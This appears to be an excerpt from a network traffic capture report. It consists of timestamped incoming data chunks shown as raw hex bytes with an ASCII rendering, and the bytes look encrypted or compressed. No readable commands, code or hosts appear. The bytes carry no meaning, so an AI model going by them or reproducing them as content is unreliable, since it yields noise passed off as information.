                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC825INData Raw: 84 15 3f 31 35 a8 85 c7 94 f1 e7 74 d2 9c 48 82 ec b5 5f 63 4a 42 b4 2a d8 ca 6e ed da 66 c0 fb 0e 06 6c 0a 7e de 03 d4 67 a3 04 e5 ec 65 56 b2 71 8b 84 af 65 6a b0 cc 46 d6 16 a4 86 6a a9 1a 4c 4e 68 be 67 a2 d8 97 82 b5 44 60 bf 09 43 f7 c9 47 3b 07 b5 1f e0 76 cd a1 f7 8a d6 af ea 4a 92 3f 80 b2 a7 6b e3 3d 79 21 b4 20 d1 c4 47 fc 94 b3 b3 2f b5 7c 6a 0a f3 ab a6 fa 62 43 27 70 7a 67 88 cb 69 e2 17 15 36 53 fd 89 87 af eb 6a 75 04 e7 e8 40 88 a5 85 63 d7 c0 42 12 e2 dd cc e8 0f 75 5d 12 20 74 52 eb ad 77 35 90 05 65 a3 4b a5 60 2f fc 93 71 47 52 2d b2 08 7c b7 ae 0d 89 78 67 0a 78 ef 1d f3 66 7a 33 e8 03 3a 00 72 20 88 31 98 a6 79 76 93 25 93 3c 68 4e 3d bd c7 36 74 72 8b c0 f8 2d ad 39 ae 6e 45 c7 c6 08 f2 e0 ef 82 42 57 77 7a b9 04 7a 7d d0 75 96 78
                                                                                                                                                                                                                                                                Data Ascii: ?15tH_cJB*nfl~geVqejFjLNhgD`CG;vJ?k=y! G/|jbC'pzgi6Sju@cBu] tRw5eK`/qGR-|xgxfz3:r 1yv%<hN=6tr-9nEBWwzz}ux
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC841INData Raw: 18 f7 28 64 75 00 25 5c ad ee d0 52 89 19 e5 e1 ef df 3f ec 05 c5 0a c8 cf fd ee 85 0b f9 67 51 9b 7b 86 d3 2f 07 c6 56 bb 8b 8a a5 ce a6 e3 0c c6 58 e4 66 41 97 24 67 5c 0d 3c 18 00 b8 aa 71 1c 65 1c 05 e5 4f c4 5c fd c7 15 17 ac b7 f1 c1 8a b7 7e 0d 94 7d eb ff 63 ad e1 9a f2 9c 5d d9 97 a9 55 3e 69 a5 2a b5 a5 99 b4 66 55 03 2d 4f 87 83 a4 e5 8e 1e 9d 8e 90 8c 2d 76 7d a1 f2 97 d1 24 83 d5 bb 90 1b f2 b2 24 0b da 10 76 22 51 09 59 6a 53 f6 eb 77 53 5e dd 1e 64 27 7c 9a 4a d6 75 41 a3 2e b9 2f 7f f0 ac 13 0d 1d 12 74 3e 9d 32 9e 28 8c d1 93 30 fb 37 d4 50 77 62 20 60 b9 74 44 27 3d 70 25 ef e2 c0 ef 6e 7d 22 d3 d3 09 a5 f4 f3 69 64 cc a8 ee bb f9 7a a4 4a 6e f9 25 85 56 e5 0f 84 f2 81 23 08 85 9c 16 12 0a fb 68 b9 a6 ed ba 19 8d 67 bc c3 30 36 c7 f9 a1
                                                                                                                                                                                                                                                                Data Ascii: (du%\R?gQ{/VXfA$g\<qeO\~}c]U>i*fU-O-v}$$v"QYjSwS^d'|JuA./t>2(07Pwb `tD'=p%n}"idzJn%V#hg06
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC857INData Raw: e0 a1 62 0b d6 8b c2 60 17 f7 13 40 f8 e1 13 3b 89 58 c6 c7 81 01 84 93 04 2f 63 8d dc 02 a9 1e f1 3a 6b f0 d1 11 92 e7 96 bb df 67 7a a5 9e 07 20 8e 79 a9 58 43 94 33 45 f5 b2 b3 d2 72 22 bf e6 c1 cf b9 a0 7c a8 d0 fa 76 4a 99 0a 95 14 b5 2d 80 0e 7b 18 93 07 b7 65 0a e5 63 a8 ec 05 f9 20 df d0 d0 7f 97 ba b7 24 18 b8 e0 28 f1 d7 97 c4 e5 a0 35 47 48 85 b5 f4 4b b0 c5 80 2e 05 08 a6 e5 05 6a b0 ef e2 a0 0e 19 eb ff 1c 85 c4 74 bd f9 fe bc a8 6f 8e 02 19 98 fd 8b d3 1f e4 1e 51 c3 60 c3 85 62 9d 62 47 99 2f 6c d4 52 0a 1f 73 ca e5 01 c2 a1 73 59 a0 af 1b b8 99 01 39 88 85 d7 36 06 5f df a0 ea 82 9d 9e a4 00 86 57 71 f7 07 fc 61 c7 f6 6f d0 b0 3a 15 95 00 05 8b ec 2d 35 8d 8f 1d 15 9a 79 1e ea 37 97 b0 59 e6 5a c5 46 51 86 47 56 5f fa c5 23 81 ad 80 41 3e
                                                                                                                                                                                                                                                                Data Ascii: b`@;X/c:kgz yXC3Er"|vJ-{ec $(5GHK.jtoQ`bbG/lRssY96_Wqao:-5y7YZFQGV_#A>
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC873INData Raw: 4d 24 81 57 b2 83 1b dc 37 4f 1b 95 55 48 69 e3 63 70 66 ab 0c 7a bb 71 c4 fc a4 d7 55 72 d8 19 7e bd 81 df 05 9d a9 db 70 d9 02 7b 7d 8d 87 5e 87 d4 22 9a 2f 51 66 14 93 a0 a6 b0 2f 79 ff d9 65 29 4b c7 6c 67 4f 32 25 1e c9 e1 fb 09 5c b6 1e 73 a1 28 00 37 35 f9 1e d3 e2 3f 1b 01 0d 79 a2 34 fb 18 ba f8 6c 12 08 0d 75 b1 05 1e 69 69 b1 56 26 ab a5 e8 ea 8f de 61 e7 ac 87 77 26 7f 0e 0d ab 7d a3 75 35 23 7f 98 66 7f c9 d8 fd 96 87 00 43 a3 32 17 71 88 80 68 e6 82 b3 f7 d6 c6 50 f6 a6 db 8d bf 6d 8b 1d a6 85 32 49 6e d9 bc 41 0e 31 76 b4 6c 8f 93 2d 9a ab bc 49 d5 be b7 5a ca a2 96 82 d6 9f 49 f5 81 c1 9f 13 a1 02 6c e1 2d 3d 65 19 be 39 28 bb 12 cc 9f 4e e2 d2 1d 93 92 58 da 68 e6 e0 1c ee 88 40 b4 bd 5c cc 94 80 55 bd 1a 8b 25 47 97 92 56 d3 41 87 bc 43
                                                                                                                                                                                                                                                                Data Ascii: M$W7OUHicpfzqUr~p{}^"/Qf/ye)KlgO2%\s(75?y4luiiV&aw&}u5#fC2qhPm2InA1vl-IZIl-=e9(NXh@\U%GVAC
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC889INData Raw: 43 37 83 f7 c0 fc ac bd 3f b8 e8 4a 93 1b a1 2d 62 46 34 30 03 63 e2 bd 40 4e a3 f1 73 e8 fa 8d b8 75 43 c9 c2 31 ff 8c be b5 4d b9 99 91 0f 96 72 cc 19 c9 c5 02 c3 3b d9 81 bb fd 15 06 a4 51 44 ab 74 43 e2 2d fa 43 89 30 2d cf 61 74 e2 cf 91 64 ec 19 33 69 8f e4 e5 70 cc 38 35 44 ea c3 e9 fa bf f2 bc cb e8 3a 85 e1 26 bc 32 8b 38 c3 5e 11 c9 ca 14 78 10 37 3c 87 93 0e f4 41 c7 d3 61 9d c5 08 77 a1 56 77 9b b5 d9 fc d2 d7 be 06 05 60 8b 7f 28 e5 af 95 18 62 cb 96 4e 3d e1 16 80 fc ff 60 99 28 79 e5 df fd 70 95 79 e3 72 be ca 84 68 c0 ec 24 85 3c ce b5 d5 b5 af 80 5b d8 21 44 b5 5c 24 bf b9 86 4e 35 3a a8 05 33 ed 63 ec 14 49 b5 d0 da 9b 75 2d 51 f5 9e 65 8a b6 59 71 b8 1a e7 c6 e8 d6 fd 76 38 4a cf 8c 06 b1 2d 87 a6 7c 7e a1 ce ae 68 ed 2e bc 92 eb 19 4b
                                                                                                                                                                                                                                                                Data Ascii: C7?J-bF40c@NsuC1Mr;QDtC-C0-atd3ip85D:&28^x7<AawVw`(bN=`(ypyrh$<[!D\$N5:3cIu-QeYqv8J-|~h.K
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC905INData Raw: c3 8e 7d 27 8f 67 69 c7 13 d4 a1 9e 69 8b 7c af 16 f8 89 81 11 f1 27 87 d2 4d 05 04 39 33 ba 64 2b f9 36 d7 0a 8f 2d a3 df 27 34 09 dc 8c 58 b7 c3 eb ae f9 ad 1e 9b 76 e2 4f f5 12 b8 b0 9b 2e a4 ec 5e 33 52 90 22 39 a3 3d 82 e8 6e c4 01 4a fc d8 14 7e 9f 8f e4 0a 23 b5 a1 af 6e 4e 6d f8 87 d7 f7 00 e4 a3 37 23 cf 01 52 59 55 7e 17 39 5e 77 0b 36 ff 64 2b 0f 14 d0 48 a6 0f c4 75 82 f4 3d 26 da cf 06 4a ea 96 d6 27 3d a2 d2 94 06 d1 b5 e8 b3 5c 5c 19 ad 74 55 ab a3 81 4e f8 14 3f de 2a 0f 4f ec f9 d3 a4 87 f2 31 16 c4 c3 b5 57 bf 71 c6 0e 98 df 31 83 48 d5 07 91 d6 58 0d bb ec f9 df 66 56 da c5 3e c8 97 e2 ce bb bf 4b 3a a6 5e 0b a1 14 77 33 ef 7d c5 c8 6e 15 25 0b c6 b9 fc 6e 4f f0 06 b1 28 cd e0 36 6f 59 9e 23 91 74 ab b6 82 82 59 7f 61 e3 d2 13 0d 22 f9
                                                                                                                                                                                                                                                                Data Ascii: }'gii|'M93d+6-'4XvO.^3R"9=nJ~#nNm7#RYU~9^w6d+Hu=&J'=\\tUN?*O1Wq1HXfV>K:^w3}n%nO(6oY#tYa"
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC921INData Raw: 63 40 b5 82 f0 97 88 4c de 79 51 a3 6f 26 5c 2f e5 d4 ea 54 73 fb 24 27 2c 20 de ab 62 4d 9b 2d c0 fd 0c 47 ce 54 51 e4 68 6e d3 cb 27 5e b3 7a 5d a3 4b 7b 62 29 03 a1 7c 9b 20 d3 83 c0 01 53 1f c5 26 2b dc d1 d8 9d c0 d5 ba eb d9 c1 8a e6 80 d0 98 8e 6a 27 01 13 02 2b a5 8e d3 03 15 12 3d 43 e4 c3 86 8e 81 0b cd e7 2f b7 70 6a f9 b5 60 a3 d1 e2 4a 7e 25 32 29 35 c1 58 5a 5e 3f c1 35 a4 97 4c e5 8e f6 57 0c 88 9c 26 c4 55 11 54 25 17 0a 39 ba 72 0d f5 92 55 8f f4 94 73 74 fb c0 d9 cc 4b 1e 0d 6a a2 f4 a1 2a 05 44 91 5f 48 61 18 65 b4 25 37 85 ad 32 a2 da 94 c7 59 7a c0 21 60 4e 12 29 56 52 5d aa be 98 65 7e 72 24 23 1c a0 88 1f 36 85 ae 0e 5f 7d 3b 5a 8a 76 a8 6a da 55 bb cf bb eb 75 8e af 8d 25 3a b1 0d 05 22 b7 83 dc 59 13 ac ec fe 27 b4 5e df 1f c5 f3
                                                                                                                                                                                                                                                                Data Ascii: c@LyQo&\/Ts$', bM-GTQhn'^z]K{b)| S&+j'+=C/pj`J~%2)5XZ^?5LW&UT%9rUstKj*D_Hae%72Yz!`N)VR]e~r$#6_};ZvjUu%:"Y'^
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC937INData Raw: ab 50 18 7b 14 54 4c bd 6c d9 41 48 0f dc 7b 17 21 21 6f a9 7a 2b 1a 1e 8d 4e 2b b9 38 9b bf 59 32 dd a6 1c cc 5f 16 5a 98 b2 89 e9 8f 50 45 4f b4 21 24 8f 6c 02 9b de 78 32 cb 51 42 bb 91 9d 8b cf 9e b4 e6 d9 a3 2c 3e dd 21 b4 71 83 54 bf 1d a7 74 2d a2 93 ae be 50 e7 48 4e ab 50 27 87 0c 47 bc 9b 4b c6 e1 7c bf c5 b5 21 2c 56 c7 02 4d c6 d7 97 63 9b 63 fe 97 10 09 b8 b0 fd a7 d4 9e c3 97 ab 93 a0 09 5d c5 a0 70 30 9a cd 59 51 45 b1 85 e1 c4 f6 8f a3 6b 71 a5 db 92 2b 74 6e 5e 8d 20 2c 83 1b 18 07 c8 f5 25 8b ff b2 31 2b 9a ef 5e 6f 71 51 2b ea 5c a3 af ba 43 de 8b 81 13 37 46 80 86 13 08 a4 a3 a4 96 30 6b 32 fb 0b 29 87 d9 54 76 37 52 b6 1f 5c 3b 11 87 08 51 96 54 a4 8d 59 87 9a 00 47 c7 02 44 16 2d c6 2c 9f 91 5e af a6 bb dd 90 a0 70 bc d7 c5 09 7e d2
                                                                                                                                                                                                                                                                Data Ascii: P{TLlAH{!!oz+N+8Y2_ZPEO!$lx2QB,>!qTt-PHNP'GK|!,VMcc]p0YQEkq+tn^ ,%1+^oqQ+\C7F0k2)Tv7R\;QTYGD-,^p~
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC953INData Raw: 6a ba 66 5b 2e cf 1d d2 c1 89 97 91 63 16 79 fd 33 4b 72 ff 56 d5 c4 84 6d 93 99 d0 f2 8e fc ae 3f b7 e6 23 f9 0e 83 30 e5 5c 2c 53 35 a3 b3 1e 99 4f 4a fd 3e 7f 4a 9e d9 7b 66 a9 c7 b1 40 d1 76 db 18 11 a3 5e 37 c0 7c 40 6f b3 50 e4 fc 38 7f f5 91 8f fa 9d 9e 9d ca 36 bb 76 33 5b f2 25 73 f2 df a0 99 5d 08 5b 3e b5 67 c3 72 f5 9e 02 d4 38 0c 18 bc 44 e8 c1 7a e3 a0 a4 87 05 f2 33 66 c9 8c 89 c6 a0 01 90 60 41 f3 7f 61 8e ec 30 0f d2 38 59 19 87 98 27 45 ed df 97 5f 14 87 13 6c 37 92 b3 fb c7 85 ec 92 99 89 b4 ec d5 f3 8d f6 b6 9a 97 b3 93 b5 d9 1e 8e 7b b3 cd 88 2b 72 64 39 8a b5 1c 89 4a 89 07 66 af 8b eb 87 15 ce 56 f2 c8 64 5f 2c b2 0d 9d c5 d1 83 c8 01 60 ea 4d a2 86 9a 98 73 39 b7 f6 99 d6 0c 1f f7 8c 02 9a 74 a8 ee bd f5 d2 61 85 ed 9f ae c8 35 00
                                                                                                                                                                                                                                                                Data Ascii: jf[.cy3KrVm?#0\,S5OJ>J{f@v^7|@oP86v3[%s][>gr8Dz3f`Aa08Y'E_l7{+rd9JfVd_,`Ms9ta5
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC969INData Raw: a3 dd de c4 54 be b0 b4 d0 c2 c0 da 64 69 7b dc c8 5e a3 13 30 e8 95 62 3a 0b 8f aa a8 31 49 08 08 33 ba f7 62 4a 0b 66 fa 0a 3c db 0d 20 a1 85 1a 9b 1a c7 7a 42 64 31 e3 a8 a6 e1 96 f2 ed 5d 28 12 b9 ee 7f 7f 39 b3 01 db 0d bb 46 20 71 e6 e6 3e 12 b3 e3 d0 86 60 b6 c1 5b 1e 6b a9 d7 f9 f7 54 98 90 32 62 0a dd a9 14 19 fb d0 22 63 04 33 b5 11 a1 cd 05 8f 7b af d4 1f 3a f5 c4 b6 f2 a5 36 7e a7 e8 ed 8c 21 fc 08 8c 49 8e 41 19 75 1a ba dd cf 8f 92 f1 9a f6 09 33 c8 be 23 0c 46 f3 f5 db 11 2e a8 5f d8 cd e4 ee 3b c4 4a ae 90 4e b9 ea 9d 88 f6 2f af 55 d6 1e 56 38 ca e2 c5 49 6e a1 22 0e 7d 9c 4d 7f fd bd 10 61 d0 08 37 b2 14 ce 96 27 7c 68 41 8a 91 91 bf f4 ae 3e ea bc 2e cc 05 9d 7d 5f d1 b6 93 5a cd 2a 39 67 ae ba 31 31 36 53 87 0d 60 74 26 34 15 fe 4f c8
                                                                                                                                                                                                                                                                Data Ascii: Tdi{^0b:1I3bJf< zBd1](9F q>`[kT2b"c3{:6~!IAu3#F._;JN/UV8In"}Ma7'|hA>.}_Z*9g116S`t&4O
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC985INData Raw: ab ca c8 77 dc 64 a2 f5 33 22 23 2d e9 38 70 d0 47 4c 43 14 12 33 dd d9 ca 96 c9 50 19 fd b0 c9 14 5d ce bb b6 37 94 d2 39 31 91 57 58 c4 00 2c 13 cf b3 c9 7c b5 92 1c 7d 91 0f 95 e8 7a c1 3b 92 c2 a3 f6 b6 24 57 c8 ba 2b be 47 80 78 de 0f f8 b0 54 38 2e c0 b0 9e f0 56 47 ca 62 84 6f a0 37 4f 25 c0 ca f7 df 73 45 da 32 a6 cc 23 09 66 a1 3c 17 7a 15 be 12 18 a9 36 e6 05 1c c4 1d 63 a0 b6 35 3c 15 6c 96 7b fe d0 b6 47 2e 83 eb 22 19 77 b9 aa d8 b8 c6 ce d3 bf 60 e4 2a 2a 27 a2 bb fa 34 be cc 94 88 2b d0 f0 64 27 5f aa 2f e9 64 26 3e e0 d1 3b af a5 23 9b 88 98 06 6b c4 e5 5b a1 05 79 e0 cc d5 60 b8 7b b8 00 f4 9c 5d e6 71 0b c4 b5 0e ef fd b8 0e 64 32 2a f7 e7 ce 6f cd 2d 96 ca 04 23 6f 02 63 0a 7c 07 1a 6f 62 3c cc d1 2c 8c 90 96 42 1e 32 20 1d 37 a9 e9 70
                                                                                                                                                                                                                                                                Data Ascii: wd3"#-8pGLC3P]791WX,|}z;$W+GxT8.VGbo7O%sE2#f<z6c5<l{G."w`**'4+d'_/d&>;#k[y`{]qd2*o-#oc|ob<,B2 7p
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1001INData Raw: 6e 85 df a7 91 5b 18 a1 ae 92 f5 cb 0c 46 a1 19 e0 d6 1f 39 1f 6d ea 1e 28 a0 df 06 97 aa 8e 48 6f ae c0 55 96 c5 17 f2 2d 3a 8f 3a 25 38 bd c7 29 64 19 2f 8e 00 06 25 08 fa c8 03 69 43 45 7c 53 0c 1d 5e 99 d5 33 d7 3e 7c 42 16 3e 11 d8 e1 a0 db a2 bf 53 b0 02 ee d2 cd 55 a1 7d e6 0f 7a 81 be ed 30 f7 64 a2 c7 d7 ba 5f bd 0b 18 1d 7f f3 12 f6 6c 01 59 d2 b1 39 32 3a 01 02 18 88 97 b1 e8 f8 8d 18 e1 4b cf 25 87 9c 67 ae d9 34 28 5d 67 b4 55 78 3e 83 c6 71 48 e9 6b 0a 4c ff 82 e8 ac b0 cc 12 21 93 3a f9 a2 46 84 c5 f3 eb ae 48 2e b6 d5 a8 27 11 e9 63 e9 a9 47 80 93 16 4d 2f 6a 0e 7c 92 98 b8 97 65 6d aa 0c bb 35 77 fc a4 62 5c 13 f3 81 25 7a c9 7e f7 4f 76 bb d6 ab 3f 1e 07 f6 36 f3 4d f2 80 5a 03 a6 40 9a 7c 90 30 e1 84 d9 73 af da 70 33 0c d8 03 e2 9e 3f
                                                                                                                                                                                                                                                                Data Ascii: n[F9m(HoU-::%8)d/%iCE|S^3>|B>SU}z0d_lY92:K%g4(]gUx>qHkL!:FH.'cGM/j|em5wb\%z~Ov?6MZ@|0sp3?
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1017INData Raw: ae 0a a2 76 83 9a cf 8b a2 cf 8f 52 34 99 b9 89 1d 9f 09 a6 a0 9d a1 7d 84 ae 7d 89 5d c5 97 b3 4b 29 80 9d 5e 81 1a 02 73 b0 0f 0e a9 9b a0 64 9d 60 60 d9 3b d0 64 44 ca 2b 7b 21 1e 22 10 1d 24 12 f5 c6 4b 06 d7 67 1f f4 7a d8 64 c1 5f c5 2a 89 55 ec 35 0f 23 0b a5 8d 8e 0b 98 cf 7c 92 85 a0 aa 50 ae 49 10 a4 aa e5 14 90 13 08 ef 57 99 fc 2d 3f 6e 11 30 73 24 23 d3 b3 58 0b d9 bd 32 a9 98 00 38 7a a1 02 fc eb dc 14 91 e0 d8 fe 35 04 c2 e7 8a 9c e4 39 9b 1a 1a a4 46 b8 d0 dc f7 17 a5 34 ec 44 c7 f0 35 75 5a d1 7d 0f 0e 75 cc 3c f4 05 9e 49 bf 90 6e c3 6f c0 a5 ce 9e 7a cf 41 ef 61 95 ef 37 3a f7 d9 87 cb f4 01 7a 0f e1 cf 14 9e 1e 87 ed 36 2e c2 13 cd b7 3a 9c e7 3f 1f a4 53 c2 a1 8e d3 97 9d b6 01 9a 67 8d 57 bc 5b d1 f7 ed d6 a2 fd aa 3e f9 b6 2a a1 da
                                                                                                                                                                                                                                                                Data Ascii: vR4}}]K)^sd``;dD+{!"$Kgzd_*U5#|PIW-?n0s$#X28z59F4D5uZ}u<InozAa7:z6.:?SgW[>*
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1033INData Raw: fe 54 69 ba 2a a5 99 09 86 c3 c0 58 f8 24 e1 cf 1b f8 78 c6 8a 51 31 bc 78 3e 9d 6d ef ef e2 c4 1f 7a f2 a0 a8 27 0e 7a 50 9b 58 3e 5c 97 15 27 1d f6 95 a7 82 57 1c b1 94 69 41 9d 03 38 14 fa 80 a9 8d e4 e3 00 6e 80 63 cb 14 df 04 04 54 78 18 cc 1a 24 98 14 2d d6 9a 9e 6a 38 f2 23 04 65 de ce 80 ab 2e aa b8 3e 2a a3 2d 18 85 cb 4b 2b ad 2e 07 86 ce ab d9 c0 d5 64 1b 66 bb 01 e7 17 44 c3 e8 96 18 3f 9c fd 37 b7 0c 5f 5c a4 34 bf b5 56 85 e7 38 f8 86 dc 25 53 49 a8 31 b0 ac ac 67 c1 f8 9b 46 f6 bf 7c fd 3c 30 06 f1 5e 48 3d e5 f6 1b 31 d1 93 63 f4 3d 50 10 af 2c c5 df ec 9f 2b 98 ef 9b f9 d0 5a ac cd a7 de 14 46 b0 53 f2 99 8c c4 9c 96 c1 80 86 a5 07 a7 13 df 09 cf d0 d9 de 3f d8 5b 57 56 2d bb 02 19 77 4c 24 94 d1 f2 d1 c5 8a c7 82 35 04 e7 7e 53 83 50 54
                                                                                                                                                                                                                                                                Data Ascii: Ti*X$xQ1x>mz'zPX>\'WiA8ncTx$-j8#e.>*-K+.dfD?7_\4V8%SI1gF|<0^H=1c=P,+ZFS?[WV-wL$5~SPT
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1049INData Raw: eb 22 9a 20 6b c3 15 72 02 ee a7 86 40 31 25 cd 1f 22 90 54 f9 c4 11 bd 0a 78 d5 99 3e 28 00 ce 6a 91 72 50 87 d4 4b 04 c3 2b 97 11 8b 2c e1 34 a5 bf c6 55 d9 8e 6f ab 78 0e 31 45 3c 6b f9 24 04 88 c1 5e 33 8f b7 d8 fc d5 14 82 fc ff 91 b4 ca b3 a3 77 63 83 85 b1 72 bd 51 23 4f 4a d8 b4 89 5a 05 64 52 bb b1 ff b1 ee fc 3e a0 40 5c d7 1e ae e2 8f 21 c9 73 25 47 96 f8 95 32 ef 27 c6 d4 d2 03 3b 37 39 3c c7 c1 ca da c1 b1 a4 3b ff 2f e1 55 df 31 e6 f1 1d d7 48 b0 78 fb 18 ae a2 8a 08 fd d5 f4 90 a5 bb 59 a6 4b 1b 1e 84 2b 8e ab 71 db b9 31 79 97 14 0c 20 bf 71 9b 30 c5 1a b9 0d c4 1f ff 60 3a 60 e3 22 1e 0e b2 1a 1e 43 4d ae 78 3f d0 a5 d7 e2 c1 05 95 07 b9 10 05 33 3e d2 e6 69 39 52 7a e8 61 61 f5 c2 00 f4 47 48 a6 d7 a9 42 4a 61 77 27 bb 24 45 8c 8f ea 67
                                                                                                                                                                                                                                                                Data Ascii: " kr@1%"Tx>(jrPK+,4Uox1E<k$^3wcrQ#OJZdR>@\!s%G2';79<;/U1HxYK+q1y q0`:`"CMx?3>i9RzaaGHBJaw'$Eg
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1065INData Raw: be 19 db ca 01 6d 0f 5c 10 12 02 fb 0b 4b 48 23 f8 ed 44 eb 94 4a 69 17 6f 05 e1 c6 bc 17 8e fc cc 41 6b 1c b4 7d 1a 22 a0 75 c6 51 70 ea 46 bf 1a b6 0c c9 ea 03 e0 32 05 84 c1 24 1d 9c 5a a7 92 63 d3 76 ff b4 68 4e 61 04 40 32 64 eb 84 71 c5 19 53 cc 21 96 d4 20 11 d1 4c b9 a2 fd b3 8c f8 3a 7d e4 79 f0 99 cf 21 7e 55 27 d1 4b 6e e0 2a ef e6 3c 9d 83 ca 1b 3a f2 26 ad 36 e3 82 1a 2b de 88 45 2a c2 42 65 fc 26 fe 27 32 c5 60 06 c2 a6 93 62 40 15 1a bf a2 cb b3 86 5b f1 a4 38 1e a3 3d eb f8 ee c1 85 d1 a7 30 2d e1 76 df 94 bd 9f 56 ae 79 aa 7c 58 da 31 82 d1 1e 84 2e c3 88 87 90 3a 44 5d f5 1b 4a a1 08 99 a8 3b bc d8 38 81 b4 38 eb 95 39 25 e9 bb 67 d3 42 f3 24 33 e9 40 50 a2 22 de ca 7f 1c b0 fd c1 e1 f4 87 8f fe c6 32 94 e5 67 a9 a3 73 f6 54 dd 90 27 5a
                                                                                                                                                                                                                                                                Data Ascii: m\KH#DJioAk}"uQpF2$ZcvhNa@2dqS! L:}y!~U'Kn*<:&6+E*Be&'2`b@[8=0-vVy|X1.:D]J;889%gB$3@P"2gsT'Z
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1081INData Raw: 3b dc b1 82 0a db 85 70 ca ad 42 3e b0 13 f7 55 39 d9 b3 32 54 2a 77 09 16 93 4e d3 eb 95 11 1f d3 d3 4d 2a 39 8b 08 c9 56 63 c5 63 58 6a 99 4e bf f5 76 f3 fa a4 92 3b 8d 48 58 63 1f c5 32 83 3e e2 a8 62 32 b8 a8 94 2f ed d7 8b f6 91 b0 8a de e3 67 85 93 08 eb a3 9a 1f 8a df fe 17 93 aa 86 90 1c 45 20 8e 85 a6 fa f2 36 0f 0e bd c6 96 1e ff 88 93 c7 0a 09 ba 2d bc 15 8f a5 0b 05 dd 2b f2 b6 36 5e 96 8c 7d 18 14 3c 50 2e 41 07 96 b3 9c c4 3d a9 d3 95 a0 4b e3 8d 4f ef f2 e6 ae 8f 00 04 8f fc 96 94 16 55 31 8c 6b af ad 88 f6 87 8f 1b e0 e5 9f a4 8f 2a 27 e6 9a 02 6c 34 0e 28 b1 14 2b da e8 39 7f 23 2f 1a 54 56 81 bb f9 e5 f1 43 65 78 19 7f a5 96 d7 af f6 7c 4f 17 14 7b bf 89 83 91 8f 7f ae de bc ec f8 85 62 98 9a b5 df db 2f e9 cb 10 1e 53 84 f9 61 86 86 67
                                                                                                                                                                                                                                                                Data Ascii: ;pB>U92T*wNM*9VccXjNv;HXc2>b2/gE 6-+6^}<P.A=KOU1k*'l4(+9#/TVCex|O{b/Sag
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1097INData Raw: ec 56 d1 d6 01 0c bd 35 15 1d 91 5d 96 b7 33 05 07 83 e4 30 a4 38 fa 6b f6 6c 44 84 c5 be 44 a6 a3 e3 77 a5 71 80 6a 63 47 27 19 02 8b b7 d1 8c 7c 83 36 3b ac b5 c0 23 59 3a 28 8c bb b8 e2 0f ff 87 57 cd 65 b8 82 c2 f9 e1 af 51 37 1a 82 2d a5 ba f5 5c a0 74 ac f0 a0 53 3d 1d 92 44 5a 1e 3a 3e a0 37 f5 43 5c ab 99 94 58 ec 71 f0 55 1c 5a 1e 3a 68 dd 69 ba 34 16 8f a8 a4 5c 43 1d a7 43 20 af a4 3d 6b 3f 7d 46 56 1e 0b b8 10 15 88 a5 be c8 15 ad 71 9d da 33 90 93 2d bc 28 a4 d2 98 f7 bf d2 88 ac 95 cb 1e 18 dd 01 14 42 3b a3 3e 06 87 5a 04 33 e0 82 43 2f bf 82 9c a6 ed 61 9d 48 bf 73 5f f3 70 95 36 d0 16 84 99 f2 05 89 d6 50 88 cf 17 18 fc 81 c8 2e 6f 29 6a 24 49 ee fc 5f db 1a 15 c3 30 93 20 bf 23 24 42 56 b2 8a f8 50 fe 9a 3a a8 ac e9 e6 ed 07 61 10 93 69
                                                                                                                                                                                                                                                                Data Ascii: V5]308klDDwqjcG'|6;#Y:(WeQ7-\tS=DZ:>7C\XqUZ:hi4\CC =k?}FVq3-(B;>Z3C/aHs_p6P.o)j$I_0 #$BVP:ai
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1113INData Raw: 2c e6 13 cd d3 fd 0a c7 c6 aa 55 8e a3 17 7e 49 b8 01 68 e8 a7 cb 69 d3 b9 c1 7e ae 0a 35 fd 95 53 a6 ae c0 45 1b b0 82 e8 2e 81 49 fe 0d 88 d9 eb 21 8d be f2 67 9b b3 ec 95 98 1e f1 1f 8e 55 f8 eb a4 fa 0c ea c2 d6 a2 a6 d4 87 29 b6 32 a8 c3 ce e7 c4 ca c2 f4 e0 07 04 97 ca 58 d5 69 e6 24 0c 12 42 5f fa 2d 13 5c 42 50 b4 07 75 07 c0 9e b9 88 67 9e 46 9d 8b ee aa 7d 1b fa f6 18 f6 89 68 09 d1 21 af 12 53 90 25 82 df ea dc 97 9f e6 81 6c 9f 2c 3d be 1c fb 9d df dd 8f 4a 9c e8 11 e4 ec 06 89 c2 1d 03 3c 14 2e ea da f1 89 3b 3b a8 2b 9a 8e 1c a8 fd 29 97 aa 9b d5 24 9c fd 85 bc 8e 88 57 e6 49 ed 53 2b 1e a6 95 4e 99 09 51 6f a2 81 82 fa 96 2e d8 a0 d2 4e 29 d4 79 5c 9b bc 7e 7c 64 0d 60 ca 98 5b 5e ac c8 db ad 3e 3d 13 db 9d fe b9 9a 4e f5 ee f9 80 8f 50 c7
                                                                                                                                                                                                                                                                Data Ascii: ,U~Ihi~5SE.I!gU)2Xi$B_-\BPugF}h!S%l,=J<.;;+)$WIS+NQo.N)y\~|d`[^>=NP
